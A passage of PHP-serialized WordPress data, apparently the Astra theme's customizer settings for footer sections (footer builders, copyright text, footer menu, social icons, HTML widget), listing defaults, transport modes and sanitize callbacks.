center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hba-inner-spacing]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-above-footer-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-above-footer-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:51:"astra-settings[section-above-footer-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:66:"astra-settings[section-above-footer-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:45:"section-below-footer-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hbb-footer-column]";a:4:{s:7:"default";s:1:"1";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hbb-footer-layout]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:4:"full";s:6:"tablet";s:4:"full";s:6:"mobile";s:4:"full";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[hbb-footer-layout-width]";a:4:{s:7:"default";s:7:"content";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hbb-footer-height]";a:4:{s:7:"default";i:80;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[hbb-footer-vertical-alignment]";a:4:{s:7:"default";s:10:"flex-start";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:25:"astra-settings[hbb-stack]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:5:"stack";s:6:"tablet";s:5:"stack";s:6:"mobile";s:5:"stack";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[hbb-footer-separator]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[hbb-footer-top-border-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-6)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:44:"astra-settings[hbb-footer-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:25:"var(--ast-global-color-5)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[hbb-inner-spacing]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-below-footer-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:52:"astra-settings[section-below-footer-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:51:"astra-settings[section-below-footer-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:66:"astra-settings[section-below-footer-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:41:"section-footer-copyright-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-copyright-editor]";a:4:{s:7:"default";s:77:"Copyright [copyright] [current_year] [site_title] | Powered by [theme_author]";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[footer-copyright-alignment]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:6:"center";s:6:"tablet";s:6:"center";s:6:"mobile";s:6:"center";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[footer-copyright-color]";a:4:{s:7:"default";s:25:"var(--ast-global-color-3)";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:55:"astra-settings[section-footer-copyright-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[section-footer-copyright-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:50:"astra-settings[font-size-section-footer-copyright]";a:4:{s:7:"default";a:6:{s:7:"desktop";i:16;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:62:"astra-settings[section-footer-copyright-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"section-footer-menu-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-create-menu-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[footer-menu-layout]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:10:"horizontal";s:6:"tablet";s:8:"vertical";s:6:"mobile";s:8:"vertical";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[footer-menu-alignment]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:6:"center";s:6:"tablet";s:6:"center";s:6:"mobile";s:6:"center";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-menu-link-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[footer-menu-background-colors]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[footer-menu-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[footer-menu-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[footer-menu-h-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[footer-menu-h-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[footer-menu-a-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[footer-menu-a-bg-color-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-main-menu-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-main-menu-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:1:"0";s:5:"right";s:2:"20";s:6:"bottom";s:1:"0";s:4:"left";s:2:"20";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:42:"astra-settings[section-footer-menu-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:37:"astra-settings[footer-menu-font-size]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:57:"astra-settings[section-footer-menu-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:63:"astra-settings[section-fb-social-icons-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[font-size-section-fb-social-icons-1]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"section-fb-social-icons-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[footer-social-1-color-type]";a:4:{s:7:"default";s:6:"custom";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[footer-social-1-icon-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:49:"astra-settings[footer-social-1-label-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[footer-social-1-background-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[footer-social-1-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[footer-social-1-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[footer-social-1-label-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[footer-social-1-label-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-social-1-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[footer-social-1-bg-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[footer-social-icons-1]";a:4:{s:7:"default";a:1:{s:5:"items";a:3:{i:0;a:8:{s:2:"id";s:8:"facebook";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#557dbc";s:10:"background";s:11:"transparent";s:4:"icon";s:8:"facebook";s:5:"label";s:8:"Facebook";}i:1;a:8:{s:2:"id";s:7:"twitter";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#7acdee";s:10:"background";s:11:"transparent";s:4:"icon";s:7:"twitter";s:5:"label";s:7:"Twitter";}i:2;a:8:{s:2:"id";s:9:"instagram";s:7:"enabled";b:1;s:6:"source";s:4:"icon";s:3:"url";s:0:"";s:5:"color";s:7:"#8a3ab9";s:10:"background";s:11:"transparent";s:4:"icon";s:9:"instagram";s:5:"label";s:9:"Instagram";}}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[footer-social-1-label-toggle]";a:4:{s:7:"default";b:0;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[footer-social-1-space]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[footer-social-1-bg-space]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[footer-social-1-size]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:18;s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[footer-social-1-radius-fields]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:56:"astra-settings[section-fb-social-icons-1-margin-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:48:"astra-settings[section-fb-social-icons-1-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:41:"astra-settings[footer-social-1-alignment]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:6:"center";s:6:"tablet";s:6:"center";s:6:"mobile";s:6:"center";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"section-primary-footer-builder-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[hb-footer-column]";a:4:{s:7:"default";s:1:"3";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[hb-footer-layout]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:7:"3-equal";s:6:"tablet";s:7:"3-equal";s:6:"mobile";s:4:"full";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[hb-footer-layout-width]";a:4:{s:7:"default";s:7:"content";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:44:"astra-settings[hb-footer-vertical-alignment]";a:4:{s:7:"default";s:10:"flex-start";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:24:"astra-settings[hb-stack]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:5:"stack";s:6:"tablet";s:5:"stack";s:6:"mobile";s:5:"stack";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[hb-footer-main-sep]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[hb-footer-main-sep-color]";a:4:{s:7:"default";s:7:"#e6e6e6";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:43:"astra-settings[hb-footer-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:9:{s:16:"background-color";s:7:"#f9f9f9";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:9:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:32:"astra-settings[hb-inner-spacing]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[section-primary-footer-builder-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[section-primary-footer-builder-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:53:"astra-settings[section-primary-footer-builder-margin]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:68:"astra-settings[section-primary-footer-builder-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:55:"astra-settings[section-fb-html-1-visibility-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[font-size-section-fb-html-1]";a:4:{s:7:"default";a:6:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"section-fb-html-1-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:29:"astra-settings[footer-html-1]";a:4:{s:7:"default";s:22:"Insert HTML text 